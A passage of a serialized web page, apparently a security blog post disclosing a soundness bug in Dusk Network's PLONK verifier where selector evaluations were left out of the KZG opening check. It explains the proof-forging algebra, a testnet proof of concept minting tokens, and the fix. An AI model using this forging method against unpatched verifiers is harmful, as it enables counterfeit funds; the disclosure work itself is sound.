ag":301,"props":152313,"children":152315},{"className":152314},[10835],[152316],{"type":30,"value":1503},{"type":24,"tag":301,"props":152318,"children":152320},{"className":152319},[10850],[152321],{"type":24,"tag":301,"props":152322,"children":152324},{"className":152323},[10855],[152325],{"type":24,"tag":301,"props":152326,"children":152328},{"className":152327},[10860],[152329],{"type":24,"tag":301,"props":152330,"children":152332},{"className":152331,"style":10830},[10865],[152333],{"type":24,"tag":301,"props":152334,"children":152335},{"style":10869},[152336,152340],{"type":24,"tag":301,"props":152337,"children":152339},{"className":152338,"style":10875},[10874],[],{"type":24,"tag":301,"props":152341,"children":152343},{"className":152342},[10880,10881,10882,10883],[152344],{"type":24,"tag":301,"props":152345,"children":152347},{"className":152346},[10835,10883],[152348],{"type":24,"tag":301,"props":152349,"children":152351},{"className":152350},[10835,10883],[152352],{"type":30,"value":36179},{"type":24,"tag":301,"props":152354,"children":152356},{"className":152355,"style":10915},[10914],[],{"type":24,"tag":301,"props":152358,"children":152360},{"className":152359},[10920],[152361],{"type":30,"value":10894},{"type":24,"tag":301,"props":152363,"children":152365},{"className":152364,"style":10915},[10914],[],{"type":24,"tag":301,"props":152367,"children":152369},{"className":152368},[10824],[152370,152374,152379],{"type":24,"tag":301,"props":152371,"children":152373},{"className":152372,"style":10935},[10829],[],{"type":24,"tag":301,"props":152375,"children":152377},{"className":152376},[10835],[152378],{"type":30,"value":546},{"type":24,"tag":301,"props":152380,"children":152382},{"className":152381},[28508],[152383],{"type":30,"value":22200},{"type":24,"tag":129693,"props":152385,"children":152386},{},[152387,152397],{"type":24,"tag":129724,"props":152388,"children":152389},{},[152390],{"type":24,"tag":188,"props":152391,"children":152394},{"href":152392,"rel":152393},"https://github.com/dusk-network/phoenix/blob/1bb89b289b3d32115c49fdf80f7f4164578a283a/circuits/src/sender_enc.rs#L28-L51",[192],[152395],{"type":30,"value":152396},"Sender-authorship signatures",{"type":24,"tag":129724,"props":152398,"children":152399},{},[152400],{"type":30,"value":152401},"The transaction payload is signed by the sender's two signing key components",{"type":24,"tag":129693,"props":152403,"children":152404},{},[152405,152415],{"type":24,"tag":129724,"props":152406,"children":152407},{},[152408],{"type":24,"tag":188,"props":152409,"children":152412},{"href":152410,"rel":152411},"https://github.com/dusk-network/phoenix/blob/1bb89b289b3d32115c49fdf80f7f4164578a283a/circuits/src/sender_enc.rs#L63-L121",[192],[152413],{"type":30,"value":152414},"Sender encryption correctness",{"type":24,"tag":129724,"props":152416,"children":152417},{},[152418],{"type":30,"value":152419},"The sender data attached to each output note is a correct ElGamal encryption under the recipient note key",{"type":24,"tag":32,"props":152421,"children":152422},{},[152423,152425,152431,152433,152442],{"type":30,"value":152424},"Rusk does not consume these claims one by one. It consumes a single valid/invalid proof verdict over ",{"type":24,"tag":145,"props":152426,"children":152428},{"className":152427},[],[152429],{"type":30,"value":152430},"tx.public_inputs()",{"type":30,"value":152432}," via ",{"type":24,"tag":188,"props":152434,"children":152436},{"href":151872,"rel":152435},[192],[152437],{"type":24,"tag":145,"props":152438,"children":152440},{"className":152439},[],[152441],{"type":30,"value":151880},{"type":30,"value":206},{"type":24,"tag":32,"props":152444,"children":152445},{},[152446],{"type":30,"value":152447},"A soundness break in PLONK voids all of these constraints simultaneously, because forged selector evaluations make the entire circuit unconstrained rather than targeting any single check.",{"type":24,"tag":2719,"props":152449,"children":152450},{},[],{"type":24,"tag":43,"props":152452,"children":152453},{"id":97002},[152454],{"type":30,"value":152455},"The bug",{"type":24,"tag":32,"props":152457,"children":152458},{},[152459,152461,152468,152470,152481],{"type":30,"value":152460},"In the ",{"type":24,"tag":188,"props":152462,"children":152465},{"href":152463,"rel":152464},"https://github.com/dusk-network/plonk/blob/82c08e8f11f2db774e4e8d28e6ba7ef833cbff25/src/proof_system/proof.rs#L362-L400",[192],[152466],{"type":30,"value":152467},"PLONK verification",{"type":30,"value":152469},", the verifier batches polynomial evaluations into a single KZG opening proof check. The evaluations included in this batch (committed via ",{"type":24,"tag":188,"props":152471,"children":152474},{"href":152472,"rel":152473},"https://github.com/dusk-network/plonk/blob/82c08e8f11f2db774e4e8d28e6ba7ef833cbff25/src/proof_system/proof.rs#L362-L373",[192],[152475],{"type":24,"tag":145,"props":152476,"children":152478},{"className":152477},[],[152479],{"type":30,"value":152480},"E_evals",{"type":30,"value":152482},") are:",{"type":24,"tag":2655,"props":152484,"children":152485},{},[152486,152518,152543,152568],{"type":24,"tag":2659,"props":152487,"children":152488},{},[152489,152495,152496,152502,152503,152509,152510,152516],{"type":24,"tag":145,"props":152490,"children":152492},{"className":152491},[],[152493],{"type":30,"value":152494},"a_eval",{"type":30,"value":377},{"type":24,"tag":145,"props":152497,"children":152499},{"className":152498},[],[152500],{"type":30,"value":152501},"b_eval",{"type":30,"value":377},{"type":24,"tag":145,"props":152504,"children":152506},{"className":152505},[],[152507],{"type":30,"value":152508},"c_eval",{"type":30,"value":377},{"type":24,"tag":145,"props":152511,"children":152513},{"className":152512},[],[152514],{"type":30,"value":152515},"d_eval",{"type":30,"value":152517}," (witness)",{"type":24,"tag":2659,"props":152519,"children":152520},{},[152521,152527,152528,152534,152535,152541],{"type":24,"tag":145,"props":152522,"children":152524},{"className":152523},[],[152525],{"type":30,"value":152526},"s_sigma_1_eval",{"type":30,"value":377},{"type":24,"tag":145,"props":152529,"children":152531},{"className":152530},[],[152532],{"type":30,"value":152533},"s_sigma_2_eval",{"type":30,"value":377},{"type":24,"tag":145,"props":152536,"children":152538},{"className":152537},[],[152539],{"type":30,"value":152540},"s_sigma_3_eval",{"type":30,"value":152542}," (permutation)",{"type":24,"tag":2659,"props":152544,"children":152545},{},[152546,152552,152553,152559,152560,152566],{"type":24,"tag":145,"props":152547,"children":152549},{"className":152548},[],[152550],{"type":30,"value":152551},"a_w_eval",{"type":30,"value":377},{"type":24,"tag":145,"props":152554,"children":152556},{"className":152555},[],[152557],{"type":30,"value":152558},"b_w_eval",{"type":30,"value":377},{"type":24,"tag":145,"props":152561,"children":152563},{"className":152562},[],[152564],{"type":30,"value":152565},"d_w_eval",{"type":30,"value":152567}," (shifted witness)",{"type":24,"tag":2659,"props":152569,"children":152570},{},[152571,152577],{"type":24,"tag":145,"props":152572,"children":152574},{"className":152573},[],[152575],{"type":30,"value":152576},"z_eval",{"type":30,"value":152578}," (permutation accumulator)",{"type":24,"tag":32,"props":152580,"children":152581},{},[152582,152584,152588],{"type":30,"value":152583},"But the following selector evaluations were ",{"type":24,"tag":5422,"props":152585,"children":152586},{},[152587],{"type":30,"value":25267},{"type":30,"value":152589}," included:",{"type":24,"tag":2655,"props":152591,"children":152592},{},[152593,152604,152615,152626],{"type":24,"tag":2659,"props":152594,"children":152595},{},[152596,152602],{"type":24,"tag":145,"props":152597,"children":152599},{"className":152598},[],[152600],{"type":30,"value":152601},"q_arith_eval",{"type":30,"value":152603}," (arithmetic selector)",{"type":24,"tag":2659,"props":152605,"children":152606},{},[152607,152613],{"type":24,"tag":145,"props":152608,"children":152610},{"className":152609},[],[152611],{"type":30,"value":152612},"q_c_eval",{"type":30,"value":152614}," (constant selector)",{"type":24,"tag":2659,"props":152616,"children":152617},{},[152618,152624],{"type":24,"tag":145,"props":152619,"children":152621},{"className":152620},[],[152622],{"type":30,"value":152623},"q_l_eval",{"type":30,"value":152625}," (left selector)",{"type":24,"tag":2659,"props":152627,"children":152628},{},[152629,152635],{"type":24,"tag":145,"props":152630,"children":152632},{"className":152631},[],[152633],{"type":30,"value":152634},"q_r_eval",{"type":30,"value":152636}," (right selector)",{"type":24,"tag":32,"props":152638,"children":152639},{},[152640,152642,152649,152650,152657,152658,152665,152666,152673],{"type":30,"value":152641},"The prover places four selector evaluations in the proof struct. The verifier absorbs them into the transcript, and the widget verifier code uses them directly in the linearization check (",{"type":24,"tag":188,"props":152643,"children":152646},{"href":152644,"rel":152645},"https://github.com/dusk-network/plonk/blob/82c08e8f11f2db774e4e8d28e6ba7ef833cbff25/src/proof_system/linearization_poly.rs#L33-L83",[192],[152647],{"type":30,"value":152648},"proof struct",{"type":30,"value":377},{"type":24,"tag":188,"props":152651,"children":152654},{"href":152652,"rel":152653},"https://github.com/dusk-network/plonk/blob/82c08e8f11f2db774e4e8d28e6ba7ef833cbff25/src/proof_system/proof.rs#L255-L286",[192],[152655],{"type":30,"value":152656},"transcript absorption",{"type":30,"value":377},{"type":24,"tag":188,"props":152659,"children":152662},{"href":152660,"rel":152661},"https://github.com/dusk-network/plonk/blob/82c08e8f11f2db774e4e8d28e6ba7ef833cbff25/src/proof_system/widget/arithmetic/verifierkey.rs#L92-L118",[192],[152663],{"type":30,"value":152664},"arithmetic widget",{"type":30,"value":377},{"type":24,"tag":188,"props":152667,"children":152670},{"href":152668,"rel":152669},"https://github.com/dusk-network/plonk/blob/82c08e8f11f2db774e4e8d28e6ba7ef833cbff25/src/proof_system/widget/ecc/scalar_mul/fixed_base/verifierkey.rs#L46-L102",[192],[152671],{"type":30,"value":152672},"fixed-base ECC widget",{"type":30,"value":152674},"). But they are never checked against the corresponding selector commitments in the verifier key, even though those commitments already exist. The prover sends whatever values it wants and the verifier trusts them.",{"type":24,"tag":32,"props":152676,"children":152677},{},[152678,152680,152684],{"type":30,"value":152679},"The easiest way to see why these four omissions are special is to contrast them with two nearby cases that are ",{"type":24,"tag":5422,"props":152681,"children":152682},{},[152683],{"type":30,"value":25267},{"type":30,"value":152685}," bugs:",{"type":24,"tag":2655,"props":152687,"children":152688},{},[152689,152829],{"type":24,"tag":2659,"props":152690,"children":152691},{},[152692,152694,152739,152741,152747,152749,152754,152755,152760,152761,152766,152768,152774,152776,152821,152823,152828],{"type":30,"value":152693},"There is no prover-supplied ",{"type":24,"tag":145,"props":152695,"children":152697},{"className":152696},[10807,10808],[152698],{"type":24,"tag":301,"props":152699,"children":152701},{"className":152700},[10813],[152702],{"type":24,"tag":301,"props":152703,"children":152705},{"className":152704,"ariaHidden":10819},[10818],[152706],{"type":24,"tag":301,"props":152707,"children":152709},{"className":152708},[10824],[152710,152714,152719,152724,152729,152734],{"type":24,"tag":301,"props":152711,"children":152713},{"className":152712,"style":10935},[10829],[],{"type":24,"tag":301,"props":152715,"children":152717},{"className":152716},[10835,28357],[152718],{"type":30,"value":294},{"type":24,"tag":301,"props":152720,"children":152722},{"className":152721},[28486],[152723],{"type":30,"value":362},{"type":24,"tag":301,"props":152725,"children":152727},{"className":152726,"style":120296},[10835,28357],[152728],{"type":30,"value":120299},{"type":24,"tag":301,"props":152730,"children":152732},{"className":152731,"style":100230},[10835,28357],[152733],{"type":30,"value":151403},{"type":24,"tag":301,"props":152735,"children":152737},{"className":152736},[28508],[152738],{"type":30,"value":9961},{"type":30,"value":152740}," field at all. ",{"type":24,"tag":145,"props":152742,"children":152744},{"className":152743},[],[152745],{"type":30,"value":152746},"ProofEvaluations",{"type":30,"value":152748}," contains ",{"type":24,"tag":145,"props":152750,"children":152752},{"className":152751},[],[152753],{"type":30,"value":152551},{"type":30,"value":377},{"type":24,"tag":145,"props":152756,"children":152758},{"className":152757},[],[152759],{"type":30,"value":152558},{"type":30,"value":8410},{"type":24,"tag":145,"props":152762,"children":152764},{"className":152763},[],[152765],{"type":30,"value":152565},{"type":30,"value":152767},", but no ",{"type":24,"tag":145,"props":152769,"children":152771},{"className":152770},[],[152772],{"type":30,"value":152773},"c_w_eval",{"type":30,"value":152775},", so the verifier never consumes an unbound ",{"type":24,"tag":145,"props":152777,"children":152779},{"className":152778},[10807,10808],[152780],{"type":24,"tag":301,"props":152781,"children":152783},{"className":152782},[10813],[152784],{"type":24,"tag":301,"props":152785,"children":152787},{"className":152786,"ariaHidden":10819},[10818],[152788],{"type":24,"tag":301,"props":152789,"children":152791},{"className":152790},[10824],[152792,152796,152801,152806,152811,152816],{"type":24,"tag":301,"props":152793,"children":152795},{"className":152794,"style":10935},[10829],[],{"type":24,"tag":301,"props":152797,"children":152799},{"className":152798},[10835,28357],[152800],{"type":30,"value":294},{"type":24,"tag":301,"props":152802,"children":152804},{"className":152803},[28486],[152805],{"type":30,"value":362},{"type":24,"tag":301,"props":152807,"children":152809},{"className":152808,"style":120296},[10835,28357],[152810],{"type":30,"value":120299},{"type":24,"tag":301,"props":152812,"children":152814},{"className":152813,"style":100230},[10835,28357],[152815],{"type":30,"value":151403},{"type":24,"tag":301,"props":152817,"children":152819},{"className":152818},[28508],[152820],{"type":30,"value":9961},{"type":30,"value":152822}," claim (",{"type":24,"tag":188,"props":152824,"children":152826},{"href":152644,"rel":152825},[192],[152827],{"type":30,"value":152648},{"type":30,"value":27511},{"type":24,"tag":2659,"props":152830,"children":152831},{},[152832,152834,152921,152923,153015,153016,153023],{"type":30,"value":152833},"There is a fourth permutation commitment ",{"type":24,"tag":145,"props":152835,"children":152837},{"className":152836},[10807,10808],[152838],{"type":24,"tag":301,"props":152839,"children":152841},{"className":152840},[10813],[152842],{"type":24,"tag":301,"props":152843,"children":152845},{"className":152844,"ariaHidden":10819},[10818],[152846],{"type":24,"tag":301,"props":152847,"children":152849},{"className":152848},[10824],[152850,152854,152859,152916],{"type":24,"tag":301,"props":152851,"children":152853},{"className":152852,"style":10935},[10829],[],{"type":24,"tag":301,"props":152855,"children":152857},{"className":152856},[28486],[152858],{"type":30,"value":541},{"type":24,"tag":301,"props":152860,"children":152862},{"className":152861},[10835],[152863,152868],{"type":24,"tag":301,"props":152864,"children":152866},{"className":152865,"style":100230},[10835,28357],[152867],{"type":30,"value":151298},{"type":24,"tag":301,"props":152869,"children":152871},{"className":152870},[10850],[152872],{"type":24,"tag":301,"props":152873,"children":152875},{"className":152874},[10855,28411],[152876,152905],{"type":24,"tag":301,"props":152877,"children":152879},{"className":152878},[10860],[152880,152900],{"type":24,"tag":301,"props":152881,"children":152883},{"className":152882,"style":99797},[10865],[152884],{"type":24,"tag":301,"props":152885,"children":152886},{"style":100277},[152887,152891],{"type":24,"tag":301,"props":152888,"children":152890},{"className":152889,"style":10875},[10874],[],{"type":24,"tag":301,"props":152892,"children":152894},{"className":152893},[10880,10881,10882,10883],[152895],{"type":24,"tag":301,"props":152896,"children":152898},{"className":152897},[10835,10883],[152899],{"type":30,"value":1761},{"type":24,"tag":301,"props":152901,"children":152903},{"className":152902},[28514],[152904],{"type":30,"value":28517},{"type":24,"tag":301,"props":152906,"children":152908},{"className":152907},[10860],[152909],{"type":24,"tag":301,"props":152910,"children":152912},{"className":152911,"style":99828},[10865],[152913],{"type":24,"tag":301,"props":152914,"children":152915},{},[],{"type":24,"tag":301,"props":152917,"children":152919},{"className":152918},[28508],[152920],{"type":30,"value":22200},{"type":30,"value":152922}," in the verifier key, but the verifier uses the commitment itself inside the linearization MSM rather than trusting a prover-supplied scalar ",{"type":24,"tag":145,"props":152924,"children":152926},{"className":152925},[10807,10808],[152927],{"type":24,"tag":301,"props":152928,"children":152930},{"className":152929},[10813],[152931],{"type":24,"tag":301,"props":152932,"children":152934},{"className":152933,"ariaHidden":10819},[10818],[152935],{"type":24,"tag":301,"props":152936,"children":152938},{"className":152937},[10824],[152939,152943,153000,153005,153010],{"type":24,"tag":301,"props":152940,"children":152942},{"className":152941,"style":10935},[10829],[],{"type":24,"tag":301,"props":152944,"children":152946},{"className":152945},[10835],[152947,152952],{"type":24,"tag":301,"props":152948,"children":152950},{"className":152949,"style":100230},[10835,28357],[152951],{"type":30,"value":151298},{"type":24,"tag":301,"props":152953,"children":152955},{"className":152954},[10850],[152956],{"type":24,"tag":301,"props":152957,"children":152959},{"className":152958},[10855,28411],[152960,152989],{"type":24,"tag":301,"props":152961,"children":152963},{"className":152962},[10860],[152964,152984],{"type":24,"tag":301,"props":152965,"children":152967},{"className":152966,"style":99797},[10865],[152968],{"type":24,"tag":301,"props":152969,"children":152970},{"style":100277},[152971,152975],{"type":24,"tag":301,"props":152972,"children":152974},{"className":152973,"style":10875},[10874],[],{"type":24,"tag":301,"props":152976,"children":152978},{"className":152977},[10880,10881,10882,10883],[152979],{"type":24,"tag":301,"props":152980,"children":152982},{"className":152981},[10835,10883],[152983],{"type":30,"value":1761},{"type":24,"tag":301,"props":152985,"children":152987},{"className":152986},[28514],[152988],{"type":30,"value":28517},{"type":24,"tag":301,"props":152990,"children":152992},{"className":152991},[10860],[152993],{"type":24,"tag":301,"props":152994,"children":152996},{"className":152995,"style":99828},[10865],[152997],{"type":24,"tag":301,"props":152998,"children":152999},{},[],{"type":24,"tag":301,"props":153001,"children":153003},{"className":153002},[28486],[153004],{"type":30,"value":362},{"type":24,"tag":301,"props":153006,"children":153008},{"className":153007,"style":120296},[10835,28357],[153009],{"type":30,"value":120299},{"type":24,"tag":301,"props":153011,"children":153013},{"className":153012},[28508],[153014],{"type":30,"value":9961},{"type":30,"value":873},{"type":24,"tag":188,"props":153017,"children":153020},{"href":153018,"rel":153019},"https://github.com/dusk-network/plonk/blob/82c08e8f11f2db774e4e8d28e6ba7ef833cbff25/src/proof_system/widget/permutation/verifierkey.rs#L24-L104",[192],[153021],{"type":30,"value":153022},"permutation verifier key",{"type":30,"value":27511},{"type":24,"tag":32,"props":153025,"children":153026},{},[153027,153029,153039],{"type":30,"value":153028},"The four selector evaluations fit neither of these safe patterns: they are prover-supplied scalars, they are used directly by verifier code, and they never appear in ",{"type":24,"tag":188,"props":153030,"children":153033},{"href":153031,"rel":153032},"https://github.com/dusk-network/plonk/blob/82c08e8f11f2db774e4e8d28e6ba7ef833cbff25/src/proof_system/proof.rs#L361-L373",[192],[153034],{"type":24,"tag":145,"props":153035,"children":153037},{"className":153036},[],[153038],{"type":30,"value":152480},{"type":30,"value":153040},", which leaves the master equation underconstrained.",{"type":24,"tag":32,"props":153042,"children":153043},{},[153044],{"type":24,"tag":177,"props":153045,"children":153048},{"alt":153046,"src":153047},"structural_trust_boundary","/posts/dusk-commitment-issues/structural_trust_boundary.svg",[],{"type":24,"tag":2719,"props":153050,"children":153051},{},[],{"type":24,"tag":43,"props":153053,"children":153055},{"id":153054},"the-exploitation",[153056],{"type":30,"value":153057},"The exploitation",{"type":24,"tag":32,"props":153059,"children":153060},{},[153061],{"type":30,"value":153062},"Since the selector evaluations are free variables, the verification equation becomes a linear equation the prover can solve after the fact.",{"type":24,"tag":32,"props":153064,"children":153065},{},[153066,153068,153074,153076,153081,153083,153088,153090,153096],{"type":30,"value":153067},"The prover commits to arbitrary witness polynomials, without needing a valid witness, and arbitrary quotient polynomials, where small random linear polynomials suffice. It follows the honest protocol through all commitment rounds, deriving the same challenges the verifier will. After seeing ",{"type":24,"tag":145,"props":153069,"children":153071},{"className":153070},[],[153072],{"type":30,"value":153073},"z_challenge",{"type":30,"value":153075},", it computes what the linearization polynomial ",{"type":24,"tag":5422,"props":153077,"children":153078},{},[153079],{"type":30,"value":153080},"should",{"type":30,"value":153082}," evaluate to for the pairing check to pass, then solves for ",{"type":24,"tag":145,"props":153084,"children":153086},{"className":153085},[],[153087],{"type":30,"value":152601},{"type":30,"value":153089},", the single free variable that makes the verification equation balance (setting ",{"type":24,"tag":145,"props":153091,"children":153093},{"className":153092},[],[153094],{"type":30,"value":153095},"q_c_eval = q_l_eval = q_r_eval = 0",{"type":30,"value":27511},{"type":24,"tag":32,"props":153098,"children":153099},{},[153100],{"type":24,"tag":177,"props":153101,"children":153104},{"alt":153102,"src":153103},"exploit_algebra","/posts/dusk-commitment-issues/exploit_algebra.svg",[],{"type":24,"tag":32,"props":153106,"children":153107},{},[153108,153110,153150,153152,153177,153179,153184],{"type":30,"value":153109},"To achieve this one may compute the linearization polynomial ",{"type":24,"tag":145,"props":153111,"children":153113},{"className":153112},[10807,10808],[153114],{"type":24,"tag":301,"props":153115,"children":153117},{"className":153116},[10813],[153118],{"type":24,"tag":301,"props":153119,"children":153121},{"className":153120,"ariaHidden":10819},[10818],[153122],{"type":24,"tag":301,"props":153123,"children":153125},{"className":153124},[10824],[153126,153130,153135,153140,153145],{"type":24,"tag":301,"props":153127,"children":153129},{"className":153128,"style":10935},[10829],[],{"type":24,"tag":301,"props":153131,"children":153133},{"className":153132,"style":99745},[10835,28357],[153134],{"type":30,"value":100563},{"type":24,"tag":301,"props":153136,"children":153138},{"className":153137},[28486],[153139],{"type":30,"value":362},{"type":24,"tag":301,"props":153141,"children":153143},{"className":153142},[10835,28357],[153144],{"type":30,"value":26050},{"type":24,"tag":301,"props":153146,"children":153148},{"className":153147},[28508],[153149],{"type":30,"value":9961},{"type":30,"value":153151}," with all selectors set to zero, evaluating it at ",{"type":24,"tag":145,"props":153153,"children":153155},{"className":153154},[10807,10808],[153156],{"type":24,"tag":301,"props":153157,"children":153159},{"className":153158},[10813],[153160],{"type":24,"tag":301,"props":153161,"children":153163},{"className":153162,"ariaHidden":10819},[10818],[153164],{"type":24,"tag":301,"props":153165,"children":153167},{"className":153166},[10824],[153168,153172],{"type":24,"tag":301,"props":153169,"children":153171},{"className":153170,"style":117581},[10829],[],{"type":24,"tag":301,"props":153173,"children":153175},{"className":153174,"style":120296},[10835,28357],[153176],{"type":30,"value":120299},{"type":30,"value":153178},", and comparing to the target value; the difference divided by the coefficient of ",{"type":24,"tag":145,"props":153180,"children":153182},{"className":153181},[],[153183],{"type":30,"value":152601},{"type":30,"value":153185}," gives the required value in a single field division.",{"type":24,"tag":2719,"props":153187,"children":153188},{},[],{"type":24,"tag":43,"props":153190,"children":153192},{"id":153191},"impact-on-dusk-network",[153193],{"type":30,"value":153194},"Impact on Dusk Network",{"type":24,"tag":32,"props":153196,"children":153197},{},[153198,153200,153207],{"type":30,"value":153199},"PLONK is the sole gatekeeper for Phoenix-specific correctness claims: note membership, ownership, note commitments, sender-authorship, and balance integrity are encoded entirely in the circuit. Rusk does check other preconditions such as nullifier uniqueness before it verifies the proof (",{"type":24,"tag":188,"props":153201,"children":153204},{"href":153202,"rel":153203},"https://github.com/dusk-network/rusk/blob/264c1ec0f4c005ef043b87deb1c866035e034330/rusk/src/lib/node/vm.rs#L153-L184",[192],[153205],{"type":30,"value":153206},"preverify path",{"type":30,"value":153208},"), but for the claims inside the proof there is no secondary validation path. With forged proofs, an attacker could:",{"type":24,"tag":6246,"props":153210,"children":153211},{},[153212,153217,153222],{"type":24,"tag":2659,"props":153213,"children":153214},{},[153215],{"type":30,"value":153216},"Inflate the token supply by fabricating input notes that do not exist in the note tree, with arbitrary values. The forged proof convinces the network these notes are real, and the attacker mints DUSK out of nothing, ready to transfer to honest users or exchanges.",{"type":24,"tag":2659,"props":153218,"children":153219},{},[153220],{"type":30,"value":153221},"Forge spends that bypass the ownership, membership, and balance checks that normally make a Phoenix input note valid.",{"type":24,"tag":2659,"props":153223,"children":153224},{},[153225],{"type":30,"value":153226},"Move forged shielded funds through honest wallets, because once a forged Phoenix transaction is accepted, the resulting shielded outputs are not distinguishable from legitimate Phoenix outputs at the protocol level.",{"type":24,"tag":32,"props":153228,"children":153229},{},[153230],{"type":30,"value":153231},"We demonstrated this with a full end-to-end proof-of-concept on a local Dusk testnet:",{"type":24,"tag":6246,"props":153233,"children":153234},{},[153235,153240,153250,153262,153267],{"type":24,"tag":2659,"props":153236,"children":153237},{},[153238],{"type":30,"value":153239},"Set up a single honest Rusk node and create two wallets (honest and malicious), both with balance 0",{"type":24,"tag":2659,"props":153241,"children":153242},{},[153243,153245],{"type":30,"value":153244},"The malicious wallet forges a PLONK proof to create ",{"type":24,"tag":60,"props":153246,"children":153247},{},[153248],{"type":30,"value":153249},"2000 DUSK from nothing",{"type":24,"tag":2659,"props":153251,"children":153252},{},[153253,153255,153260],{"type":30,"value":153254},"The malicious wallet transfers ",{"type":24,"tag":60,"props":153256,"children":153257},{},[153258],{"type":30,"value":153259},"1337 DUSK",{"type":30,"value":153261}," to the honest wallet using a normal (honestly-proved) transaction",{"type":24,"tag":2659,"props":153263,"children":153264},{},[153265],{"type":30,"value":153266},"The honest node validates both transactions and mines them into blocks",{"type":24,"tag":2659,"props":153268,"children":153269},{},[153270],{"type":30,"value":153271},"The honest wallet shows a confirmed balance of 1337 DUSK",{"type":24,"tag":32,"props":153273,"children":153274},{},[153275],{"type":24,"tag":177,"props":153276,"children":153279},{"alt":153277,"src":153278},"end_to_end","/posts/dusk-commitment-issues/end_to_end.svg",[],{"type":24,"tag":32,"props":153281,"children":153282},{},[153283,153285,153291,153293,153300],{"type":30,"value":153284},"At the time of discovery, DUSK's market cap was roughly ",{"type":24,"tag":188,"props":153286,"children":153288},{"href":148587,"rel":153287},[192],[153289],{"type":30,"value":153290},"~60M",{"type":30,"value":153292},". The entire shielded transaction layer was at risk. Because Phoenix is privacy-preserving, forged outputs accepted into the shielded pool would have been difficult to distinguish after the fact, similar to Neptune Cash with the ",{"type":24,"tag":188,"props":153294,"children":153297},{"href":153295,"rel":153296},"https://neptune.cash/articles/critical-vulnerability-disclosure",[192],[153298],{"type":30,"value":153299},"Triton VM vulnerability",{"type":30,"value":206},{"type":24,"tag":2719,"props":153302,"children":153303},{},[],{"type":24,"tag":43,"props":153305,"children":153307},{"id":153306},"the-fix",[153308],{"type":30,"value":153309},"The fix",{"type":24,"tag":32,"props":153311,"children":153312},{},[153313],{"type":30,"value":153314},"The fix adds the four selector evaluations to the KZG batch opening check, so they are verified against the selector commitments already present in the verifier key:",{"type":24,"tag":2655,"props":153316,"children":153317},{},[153318,153363],{"type":24,"tag":2659,"props":153319,"children":153320},{},[153321,153323,153334,153336,153342,153343,153349,153350,153356,153357],{"type":30,"value":153322},"Extend ",{"type":24,"tag":188,"props":153324,"children":153327},{"href":153325,"rel":153326},"https://github.com/dusk-network/plonk/blob/82c08e8f11f2db774e4e8d28e6ba7ef833cbff25/src/compiler/prover.rs#L509",[192],[153328],{"type":24,"tag":145,"props":153329,"children":153331},{"className":153330},[],[153332],{"type":30,"value":153333},"compute_aggregate_witness",{"type":30,"value":153335}," on the prover side to also include ",{"type":24,"tag":145,"props":153337,"children":153339},{"className":153338},[],[153340],{"type":30,"value":153341},"q_arith",{"type":30,"value":377},{"type":24,"tag":145,"props":153344,"children":153346},{"className":153345},[],[153347],{"type":30,"value":153348},"q_c",{"type":30,"value":377},{"type":24,"tag":145,"props":153351,"children":153353},{"className":153352},[],[153354],{"type":30,"value":153355},"q_l",{"type":30,"value":8410},{"type":24,"tag":145,"props":153358,"children":153360},{"className":153359},[],[153361],{"type":30,"value":153362},"q_r",{"type":24,"tag":2659,"props":153364,"children":153365},{},[153366,153368,153378],{"type":30,"value":153367},"Add their evaluations to ",{"type":24,"tag":188,"props":153369,"children":153372},{"href":153370,"rel":153371},"https://github.com/dusk-network/plonk/blob/82c08e8f11f2db774e4e8d28e6ba7ef833cbff25/src/proof_system/proof.rs#L362",[192],[153373],{"type":24,"tag":145,"props":153374,"children":153376},{"className":153375},[],[153377],{"type":30,"value":152480},{"type":30,"value":153379}," on the verifier side, so they're checked against the commitments in the verifier key",{"type":24,"tag":32,"props":153381,"children":153382},{},[153383,153385,153392],{"type":30,"value":153384},"This was done in ",{"type":24,"tag":188,"props":153386,"children":153389},{"href":153387,"rel":153388},"https://github.com/dusk-network/plonk/commit/645265b748d2698bcb403b794fc2d58340b340f1",[192],[153390],{"type":30,"value":153391},"commit 645265b7",{"type":30,"value":153393},", which landed on February 14, 2026.",{"type":24,"tag":2719,"props":153395,"children":153396},{},[],{"type":24,"tag":43,"props":153398,"children":153400},{"id":153399},"why-was-this-missed",[153401],{"type":30,"value":153402},"Why was this missed?",{"type":24,"tag":32,"props":153404,"children":153405},{},[153406,153408,153415,153416,153423,153425,153432,153434,153441],{"type":30,"value":153407},"Dusk's stack had been heavily audited: a ",{"type":24,"tag":188,"props":153409,"children":153412},{"href":153410,"rel":153411},"https://github.com/dusk-network/audits/blob/main/core-audits/2023-12_plonk-audit-report_porter-adams.pdf",[192],[153413],{"type":30,"value":153414},"December 2023 audit of dusk-plonk",{"type":30,"value":131078},{"type":24,"tag":188,"props":153417,"children":153420},{"href":153418,"rel":153419},"https://github.com/dusk-network/audits/blob/main/core-audits/2024-09_phoenix-audit-report_jules-de-smit.pdf",[192],[153421],{"type":30,"value":153422},"September 2024 audit of Phoenix",{"type":30,"value":153424},", and a ",{"type":24,"tag":188,"props":153426,"children":153429},{"href":153427,"rel":153428},"https://github.com/dusk-network/audits/blob/main/core-audits/2024-09_rusk-node-library_oak-security.pdf",[192],[153430],{"type":30,"value":153431},"September 2024 Oak Security audit of the Rusk node library",{"type":30,"value":153433},". Dusk's public ",{"type":24,"tag":188,"props":153435,"children":153438},{"href":153436,"rel":153437},"https://dusk.network/news/audits-overview",[192],[153439],{"type":30,"value":153440},"audits overview",{"type":30,"value":153442}," summarizes the broader audit program. The bug still went unnoticed because it hides behind a very easy mental-model mistake.",{"type":24,"tag":32,"props":153444,"children":153445},{},[153446,153448,153453],{"type":30,"value":153447},"At the polynomial level, selectors are public circuit descriptions. A reviewer who keeps that standard PLONK model in mind will naturally think \"selectors are verifier-side\" and move on, overlooking the architectural deviation where Dusk's verifier started consuming prover-supplied selector ",{"type":24,"tag":5422,"props":153449,"children":153450},{},[153451],{"type":30,"value":153452},"evaluations",{"type":30,"value":206},{"type":24,"tag":32,"props":153455,"children":153456},{},[153457],{"type":30,"value":153458},"This was a pure proof-system bug, not a Phoenix-circuit bug; the circuit constraints themselves were correctly written. The failure occurred entirely because the verifier accepted proof fields that bypassed the fundamental invariant established earlier: they were neither locally computed nor cryptographically bound to an opening proof.",{"type":24,"tag":32,"props":153460,"children":153461},{},[153462],{"type":30,"value":153463},"The check for this class of bug is mechanical: enumerate every field in the proof's evaluation struct and verify that each one either appears in the opening proof batch or is computed locally by the verifier.",{"type":24,"tag":43,"props":153465,"children":153467},{"id":153466},"a-similar-bug-in-espresso-systems-jellyfish",[153468],{"type":30,"value":153469},"A similar bug in Espresso Systems' 